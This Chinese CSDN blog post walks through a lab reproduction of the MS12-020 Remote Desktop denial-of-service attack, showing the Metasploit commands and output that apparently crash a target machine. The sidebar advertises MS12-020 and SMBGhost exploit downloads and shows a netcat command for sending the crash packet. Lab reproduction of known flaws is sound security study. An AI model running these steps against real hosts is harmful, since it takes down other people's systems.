msf下ms12020打蓝屏 - cracer_CSDN

已于 2023-07-11 09:52:57 修改
阅读量91 收藏
点赞数
分类专栏: cracer-CSDN 文章标签: linux
于 2023-07-11 06:40:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67888657/article/details/131651691
版权

本机 192.168.0.167  目标机 192.168.0.246

root@bt:~# ifconfig

eth1      Link encap:以太网  硬件地址 00:0c:29:40:22:04  

          inet 地址:192.168.0.167  广播:192.168.0.255  掩码:255.255.255.0

          inet6 地址: fe80::20c:29ff:fe40:2204/64 Scope:Link

          UP BROADCAST RUNNING MULTICAST  MTU:1500  跃点数:1

          接收数据包:196 错误:0 丢弃:0 过载:0 帧数:0

          发送数据包:18 错误:0 丢弃:0 过载:0 载波:0

          碰撞:0 发送队列长度:1000

          接收字节:15200 (15.2 KB)  发送字节:2736 (2.7 KB)

          中断:19 基本地址:0x2000

lo        Link encap:本地环回  

          inet 地址:127.0.0.1  掩码:255.0.0.0

          inet6 地址: ::1/128 Scope:Host

          UP LOOPBACK RUNNING  MTU:16436  跃点数:1

          接收数据包:15 错误:0 丢弃:0 过载:0 帧数:0

          发送数据包:15 错误:0 丢弃:0 过载:0 载波:0

          碰撞:0 发送队列长度:0

          接收字节:953 (953.0 B)  发送字节:953 (953.0 B)

root@bt:~# msfconsole

# cowsay++

 ____________

< metasploit >

 ------------

       \   ,__,

        \  (oo)____

           (__)    )\

              ||--|| *

       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]

+ -- --=[ 927 exploits - 499 auxiliary - 151 post

+ -- --=[ 251 payloads - 28 encoders - 8 nops

msf > search ms12_020

Matching Modules

================

   Name                                              Disclosure Date          Rank    Description

   ----                                              ---------------          ----    -----------

   auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16 00:00:00 UTC  normal  MS12-020 Microsoft Remote Desktop Use-After-Free DoS

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf  auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.0.246

RHOST => 192.168.0.246

msf  auxiliary(ms12_020_maxchannelids) > set RPORT  3389

RPORT => 3389

msf  auxiliary(ms12_020_maxchannelids) > exploit

[*] 192.168.0.246:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS

[*] 192.168.0.246:3389 - 210 bytes sent

[*] 192.168.0.246:3389 - Checking RDP status...

[+] 192.168.0.246:3389 seems down  判断目标蓝屏

[*] Auxiliary module execution completed

msf  auxiliary(ms12_020_maxchannelids) >

创心域技术网
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF_EXPLOIT-WINDOWS-FILEFORMAT-WINRAR_CVE_2023_38831-.txt
09-10
MSF_EXPLOIT-WINDOWS-FILEFORMAT-WINRAR_CVE_2023_38831-.txt
远程POC-SMBGhost_RCE_PoC.zip
06-09
CVE-2020-0796漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客...
复现ms12020
Mike_Roger的博客
01-23 1833
据说这个漏洞是微软在12年发布的一个系统漏洞,针对winxp和win sever2003,通过攻击,导致重启或蓝屏。   来说说利用过程,过程还是很简单的,让我觉得还是挺适合新手。。。但是攻击目标必须开着3389端口,,,这,,咳咳还是说过程吧。。。   search ms12_020   第二个是扫描,用来扫描网段上有漏洞的主机,第一个是攻击模块 use auxiliary/sc
ms12-020 死亡蓝屏漏洞复现
lianliandad的博客
11-01 3037
好好学习
渗透测试-蓝屏攻击 MS12020 远程桌面漏洞
星虐
01-02 5534
一、漏洞原理 攻击者向目标发送特定内容的RDP包,造成操作系统蓝屏崩溃。 二、什么是RDP 远程桌面协议 (RDP)用于在终端服务器和终端服务器客户端之间进行通信的。RDP协议的TCP通信端口号是3389 三、漏洞演示 确定IP地址 攻击端kaliIP地址 靶机win2008IP地址 namp扫描靶机端口服务信息 靶机开启3389端口 进入msf,搜索ms12-020模块 使用第二个模块对目标进行该漏洞检测 【+】The target is vulnerable. 目标是易受攻击的 使用 au
中职网络安全2022国赛之MS12020漏洞扫描与利用(CVE-2012-0002)
Ba1_Ma0的博客
04-25 5604
简介 我做了一个简单的环境来复现这个漏洞,需要虚拟机环境的可以加我qq:3316735898,有什么不会的也可以问我 1.在MSF工具中用search命令搜索MS12020 RDP拒绝服务攻击模块,将回显结果中的漏洞披露时间作为Flag值(如:2012-10-16)提交 搜索漏洞模块: search ms12-020 时间为: 2012-03-16 2.在MSF工具中调用MS12020 RDP拒绝服务漏洞的辅助扫描模块,将调用此模块的命令作为Flag值提交 use 3.使用set命令设置目标IP,
ms12-020(蓝屏攻击漏洞复现)
Martin-share的博客
02-11 4754
ms12-020(蓝屏攻击漏洞复现)
rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_
09-30
"rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_"这个标题暗示了我们正在讨论一个与RTK相关的ROS(Robot Operating System)驱动程序,它可能涉及到了一些关键组件和技术。 首先,"RTK"是Real-Time Kinematic的...
VB-shujuku.rar_VB_vb MSF SHUJUKU
09-22
标题中的"VB-shujuku.rar_VB_vb MSF SHUJUKU"表明这是一个与Visual Basic(VB)相关的数据库教程或示例项目,其中可能包含如何利用VB与数据库进行交互的代码和实例。MSF(Microsoft Solutions Framework)在这里可能...
matlab的egde源代码-matlab_px4_msf:matlab_px4_msf
05-22
matlab_px4_msf开始 此文件夹包含Matlab中带有MSF的ECL组件的派生和测试套件。 运行EKF重放的说明 确保“ EKF_replay”目录位于您具有完全读写访问权限的位置 在“ EKF_replay”目录下创建一个“ TestData”子目录 ...
ms12-020.exe/windows远程桌面溢出程序/远程蓝屏重启exploit
09-11
Usage: MS12-020.exe Remote_host_add Example: MS12-020.exe www.test.com MS12-020.exe 192.168.1.1 Source Code Copyright Silic Group Application Copyright Xiaomo.wabzsy
MS12-020.EXE漏洞利用程序(蓝屏版)
03-20
MS12-020.EXE漏洞利用程序(蓝屏版)
ms12-020 xp补丁
12-20
ms12-020 xp补丁 WindowsXP-KB2621440-x86
ms12-020 for exe版本
03-17
MS12-020 PoC RDP MS , ms12-020 for exe版本 ms12-020,下载,exp,0day ms12-020.exe 3389远程溢出0DAY
MS12020 丁野版(exe版本)
03-20
MS12020 丁野版漏洞利用程序 1.运行 start.bat 在当前打开cmd.exe 2.输入 nc IP 3389 < exp.dy 执行完一次后多执行几次,按↑,你懂得。 3.当回显三个小心时即对方蓝屏。 exp.dy 数据包 nc.exe 军刀 cmd.exe 。。。 丁野 QQ:270736345 请勿做非法用途。
利用MS12-020实现拒绝服务攻击
wrypot的博客
04-01 601
然后再run一下,The target is vulnerable,检测出目标主机是有这个漏洞的。设置目标地址后再show options看一下,成功将地址添加到载荷里面了。注意一下,添加的这个地址需要是win2003存在的,不存在的地址是没用的。,将地址添加到攻击载荷里面,最后run,这里有两个载荷,使用check载荷。发现可以添加RHOSTS目标地址。现在将check载荷换成攻击载荷。看这个载荷里面可以添加哪些参数。RPORT端口是3389端口。然后用set去设置目标地址。目标主机被打崩,出现蓝屏
MS12-020远程桌面代码执行漏洞修复
热门推荐
iokla
01-26 1万+
MS12-020远程桌面代码执行漏洞修复1、漏洞简介2、漏洞验证3、漏洞修复 1、漏洞简介 MS12-020(全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞),远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。Windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化的或已经删除的对象,导致任意代码执行,
ms12-020检测工具
06-22
Windows ms12-020检测工具。仅仅只是检测工具,渗透测试工具!请勿滥用!
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用)
11-07
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用) [网上流传版]MS12-020 PoC[bug修正版 + 数据包nc发送版] [个人版]ms12-020 Ruby,Python,EXE,DAT,NC一应俱全
#!/usr/bin/env bash python3 train.py \ --data_dir <Your data dir> \ --images_folder imgs/ \ --train_annotations_file aus_dataset.pkl \ --test_annotations_file aus_dataset_test.pkl \ --generator_name unet_msf_generator \ --normtype_G instancenorm \ --discriminator_name discriminator_wgan_plus \ --normtype_D None \ --name experiment_1 \ --nepochs_no_decay 30 \ --nepochs_decay 20 \ --gpu_ids 0,1 \ --lr_D 1e-4 \ --lr_G 1e-4 \ --lr_decays_to 1e-5 \ --image_size 128 \ --batch_size 16 \ --ngf 64 \ --ndf 64 \ --cond_nc 13 \ --train_G_every_n_iterations 4 \ --lambda_D_prob 1 \ --lambda_D_cond 150 \ --lambda_D_gp 10 \ --lambda_G_fake_cond 150 \ --lambda_rec_l1 30 \ --lambda_cyc_l1 30 \ --lambda_smooth 1e-5
最新发布
07-13
根据你提供的内容,这是一个 Bash 脚本,其中调用了 `python3` 命令来运行 `train.py` 脚本,并传递了一系列参数。 在运行这个脚本之前,你需要确保以下几点: 1. Python 环境:你需要安装 Python 3,并且在命令行中可以使用 `python3` 命令来执行 Python 代码。你可以使用 `python3 --version` 命令检查 Python 版本。 2. 依赖项:脚本可能依赖一些 Python 包或库,请确保你已经安装了这些依赖项。你可以使用 `pip install package_name` 命令来安装所需的包。 3. 数据目录和文件:在运行脚本时,你需要提供正确的数据目录和文件路径。请将 `<Your data dir>` 替换为你实际的数据目录路径,并确保 `imgs/`、`aus_dataset.pkl` 和 `aus_dataset_test.pkl` 这些文件存在于指定的路径中。 4. GPU 支持:脚本中使用了 `--gpu_ids 0,1` 参数来指定在哪些 GPU 上运行训练。请确保你有可用的 GPU,并且已经安装了相应的 GPU 驱动和 CUDA 工具包。 在确认满足上述要求后,你可以在终端中运行该脚本,例如: ```bash bash train.sh ``` 这将执行 `train.sh` 脚本,并传递相应的参数给 `train.py` 脚本进行训练。请注意,你可能还需要根据自己的需求对脚本中的参数进行调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值